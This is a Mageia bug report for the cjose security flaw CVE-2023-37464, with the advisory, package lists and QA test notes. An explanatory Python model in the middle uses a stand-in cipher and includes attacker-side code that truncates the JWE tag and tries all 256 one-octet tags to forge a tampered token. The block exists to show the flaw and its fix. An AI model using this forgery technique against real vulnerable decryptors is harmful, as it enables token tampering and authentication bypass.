| Summary: | cjose new security issue CVE-2023-37464 | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | Nicolas Salguero <nicolas.salguero> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | normal | ||
| Priority: | Normal | CC: | andrewsfarm, herman.viaene, marja11, nicolas.salguero, sysadmin-bugs |
| Version: | 9 | Keywords: | advisory, validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | MGA8TOO MGA8-64-OK MGA9-64-OK | ||
| Source RPM: | cjose-0.6.1-3.mga9.src.rpm | CVE: | CVE-2023-37464 |
| Status comment: | |||
Description
Nicolas Salguero
2023-09-11 16:10:13 CEST

Nicolas Salguero
2023-09-11 16:10:31 CEST
Whiteboard: (none) => MGA9TOO, MGA8TOO

Version : 0.6.2.2 ... Security fix for CVE-2023-37464

No maintainer in view for this pkg, so assigning the update globally.

Assignee: bugsquad => pkg-bugs

Suggested advisory:
========================

The updated packages fix a security vulnerability:

The AES GCM decryption routine incorrectly uses the Tag length from the actual Authentication Tag provided in the JWE. The spec says that a fixed length of 16 octets must be applied. Therefore this bug allows an attacker to provide a truncated Authentication Tag and to modify the JWE accordingly. (CVE-2023-37464)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37464
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DFWAPMYYVBO2U65HPYDTBEKNSXG4TP5C/
========================

Updated packages in 9/core/updates_testing:
========================
lib(64)cjose0-0.6.1-3.1.mga9
lib(64)cjose-devel-0.6.1-3.1.mga9

from SRPM:
cjose-0.6.1-3.1.mga9.src.rpm

Updated packages in 8/core/updates_testing:
========================
lib(64)cjose0-0.6.1-1.1.mga8
lib(64)cjose-devel-0.6.1-1.1.mga8

from SRPM:
cjose-0.6.1-1.1.mga8.src.rpm

Status comment: Fixed in 0.6.2.2 => (none)
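The advisory above describes the defect in one sentence; the model below shows why a sender-chosen tag length is fatal. It is an added example, not cjose code and not the upstream fix: AES-GCM is replaced by a standard-library stand-in (an HMAC-SHA256 counter-mode keystream plus a 16-octet HMAC tag over the protected header, IV and ciphertext), which is an assumption made so the script runs offline. The forgery cost depends only on how many tag octets the receiver compares, so the stand-in reproduces the security property at issue: the vulnerable decryptor compares as many octets as the JWE supplies, so a one-octet tag is forged in at most 256 attempts against a decryption oracle, while the hardened decryptor rejects any GCM tag that is not exactly 16 octets before comparing anything. The `{"alg":"dir","enc":"A256GCM"}` header, the sample claims and the bit-flip position are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import secrets

TAG_LEN = 16  # RFC 7518 section 5.3: the AES GCM Authentication Tag is 128 bits
GCM_ENCS = {"A128GCM", "A192GCM", "A256GCM"}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _keystream(key: bytes, iv: bytes, length: int) -> bytes:
    # Stand-in for GCM's AES-CTR keystream (assumption of this model, not real AES):
    # HMAC-SHA256 in counter mode. As in CTR, flipping a ciphertext bit flips the
    # same plaintext bit, which is what makes a tag forgery worth having.
    blocks, counter = [], 0
    while sum(map(len, blocks)) < length:
        blocks.append(hmac.new(key, iv + counter.to_bytes(4, "big"), hashlib.sha256).digest())
        counter += 1
    return b"".join(blocks)[:length]


def _tag(key: bytes, aad: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    # Stand-in for the GCM Authentication Tag over AAD || IV || ciphertext,
    # fixed at the 16 octets the JWE spec requires.
    return hmac.new(key, aad + iv + ciphertext, hashlib.sha256).digest()[:TAG_LEN]


def jwe_encrypt(key: bytes, plaintext: bytes) -> str:
    """Compact JWE: header.encrypted_key.iv.ciphertext.tag ("dir" means no encrypted key)."""
    header = b64url_encode(json.dumps({"alg": "dir", "enc": "A256GCM"}).encode())
    iv = secrets.token_bytes(12)
    ciphertext = _xor(plaintext, _keystream(key, iv, len(plaintext)))
    tag = _tag(key, header.encode("ascii"), iv, ciphertext)
    return ".".join([header, "", b64url_encode(iv), b64url_encode(ciphertext), b64url_encode(tag)])


def _parse(jwe: str):
    parts = jwe.split(".")
    if len(parts) != 5:
        raise ValueError("not a compact-serialised JWE")
    header_b64, _, iv_b64, ct_b64, tag_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    return header, header_b64.encode("ascii"), b64url_decode(iv_b64), b64url_decode(ct_b64), b64url_decode(tag_b64)


def jwe_decrypt_vulnerable(key: bytes, jwe: str) -> bytes:
    """CVE-2023-37464 behaviour: the tag length is whatever the JWE carries,
    so only that many octets are ever compared."""
    _, aad, iv, ciphertext, tag = _parse(jwe)
    expected = _tag(key, aad, iv, ciphertext)
    if not hmac.compare_digest(expected[: len(tag)], tag):  # BUG: len(tag) is sender-controlled
        raise ValueError("authentication tag mismatch")
    return _xor(ciphertext, _keystream(key, iv, len(ciphertext)))


def jwe_decrypt_fixed(key: bytes, jwe: str) -> bytes:
    """Hardened: for the GCM content-encryption algorithms the tag must be exactly
    16 octets before any comparison happens, so a truncated tag is rejected outright."""
    header, aad, iv, ciphertext, tag = _parse(jwe)
    if header.get("enc") in GCM_ENCS and len(tag) != TAG_LEN:
        raise ValueError(f"GCM tag must be {TAG_LEN} octets, got {len(tag)}")
    expected = _tag(key, aad, iv, ciphertext)
    if not hmac.compare_digest(expected, tag):
        raise ValueError("authentication tag mismatch")
    return _xor(ciphertext, _keystream(key, iv, len(ciphertext)))


def forge_candidates(jwe: str, byte_index: int = 0):
    """Attacker side, no key needed: flip one ciphertext bit, truncate the tag to
    a single octet, and emit the 256 possible one-octet tags."""
    header_b64, ek, iv_b64, ct_b64, _ = jwe.split(".")
    tampered = bytearray(b64url_decode(ct_b64))
    tampered[byte_index] ^= 0x01
    for guess in range(256):
        yield ".".join([header_b64, ek, iv_b64, b64url_encode(bytes(tampered)), b64url_encode(bytes([guess]))])


def run_attack(key: bytes, jwe: str, decrypt) -> list:
    """Feed every forgery to a decryption oracle and return the plaintexts it accepted."""
    accepted = []
    for candidate in forge_candidates(jwe):
        try:
            accepted.append(decrypt(key, candidate))
        except ValueError:
            pass
    return accepted


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    token = jwe_encrypt(key, b'{"sub":"alice","admin":false}')
    print("vulnerable oracle accepted:", run_attack(key, token, jwe_decrypt_vulnerable))
    print("fixed oracle accepted:     ", run_attack(key, token, jwe_decrypt_fixed))
```

Running the script shows the vulnerable oracle accepting exactly one of the 256 forged tokens (the tampered plaintext, with no knowledge of the key) and the fixed oracle accepting none. The check in `jwe_decrypt_fixed` is the shape of the correct fix: the tag length comes from the content-encryption algorithm named in the protected header, never from the token itself.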
Nicolas Salguero
2023-09-18 09:21:20 CEST
Assignee: nicolas.salguero => qa-bugs

MGA8-64 Xfce on Acer Aspire 5253
No installation issues
No wiki, no previous updates, so
# urpmq --whatrequires lib64cjose0
apache-mod_auth_openidc
apache-mod_auth_openidc
apache-mod_auth_openidc
lib64cjose-devel
lib64cjose-devel
lib64cjose0
and
# urpmq --whatrequires-recursive lib64cjose0
apache-mod_auth_openidc
apache-mod_auth_openidc
apache-mod_auth_openidc
lib64cjose-devel
lib64cjose-devel
lib64cjose0
No idea how to get any further here and googling does not bring me any further than the repos.

CC: (none) => herman.viaene

(In reply to Herman Viaene from comment #3)
> MGA8-64 Xfce on Acer Aspire 5253
> No installation issues
> No wiki, no previous updates, so
> # urpmq --whatrequires lib64cjose0
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> lib64cjose-devel
> lib64cjose-devel
> lib64cjose0
> and
> # urpmq --whatrequires-recursive lib64cjose0
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> lib64cjose-devel
> lib64cjose-devel
> lib64cjose0
> No idea how to get any further here and googling does not bring me any
> further than the repos.

Any suggestions for how to test this update? Asking for feedback

Keywords: (none) => feedback

(In reply to Herman Viaene from comment #3)
> MGA8-64 Xfce on Acer Aspire 5253
> No installation issues
> No wiki, no previous updates, so
> # urpmq --whatrequires lib64cjose0
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> lib64cjose-devel
> lib64cjose-devel
> lib64cjose0
> and
> # urpmq --whatrequires-recursive lib64cjose0
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> apache-mod_auth_openidc
> lib64cjose-devel
> lib64cjose-devel
> lib64cjose0
> No idea how to get any further here and googling does not bring me any
> further than the repos.

I found this https://groups.google.com/g/mod_auth_openidc/c/-7XkKimba2I , but it is too much for me

MGA8-64 Plasma in VirtualBox.

For lack of anything else to try, I decided to look for previous bugs for apache-mod_auth_openidc. I installed that, which brought in lib64cjose0, then used qarepo to update lib64cjose0. There were no installation issues.

Then I used the basic test found in bug25810:

[root@localhost ~]# systemctl start httpd
[root@localhost ~]# systemctl -l status httpd
● httpd.service - The Apache HTTP Server
     Loaded: loaded (/usr/lib/systemd/system/httpd.service; disabled; vendor preset: disabled)
     Active: active (running) since Sun 2023-12-17 16:06:26 EST; 22s ago
   Main PID: 18862 (httpd)
     Status: "Total requests: 0; Idle/Busy workers 100/0;Requests/sec: 0; Bytes served/sec: 0 B/sec"
      Tasks: 6 (limit: 3566)
     Memory: 7.7M
        CPU: 72ms
     CGroup: /system.slice/httpd.service
             ├─18862 /usr/sbin/httpd -DFOREGROUND
             ├─18864 /usr/sbin/httpd -DFOREGROUND
             ├─18865 /usr/sbin/httpd -DFOREGROUND
             ├─18866 /usr/sbin/httpd -DFOREGROUND
             ├─18867 /usr/sbin/httpd -DFOREGROUND
             └─18868 /usr/sbin/httpd -DFOREGROUND

Dec 17 16:06:26 localhost systemd[1]: Starting The Apache HTTP Server...
Dec 17 16:06:26 localhost systemd[1]: Started The Apache HTTP Server.
Dec 17 16:06:26 localhost httpd[18862]: AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using ::1. Set the 'ServerName' directive globally to suppress this message

Then I pointed firefox toward localhost, receiving a page that said "It works!"

That and a clean install was enough for that bug, so I'm using it here, too. This is good on MGA8.

Whiteboard: MGA8TOO => MGA8TOO MGA8-64-OK

Mga9-64 Plasma with an i5-2500, Intel graphics.

Same procedure as comment 6, with the same results. Calling this good for MGA9.

Validating. Advisory in comment 2.

Keywords: (none) => validated_update
Marja Van Waes
2023-12-18 00:06:59 CET
CVE: (none) => CVE-2023-37464
Keywords: (none) => advisory

Advisory from comment 2 added to SVN. Please remove the "advisory" keyword if it needs to be changed. It also helps when obsolete advisories are tagged as "obsolete".

An update for this issue has been pushed to the Mageia Updates repository.
https://advisories.mageia.org/MGASA-2023-0350.html

Resolution: (none) => FIXED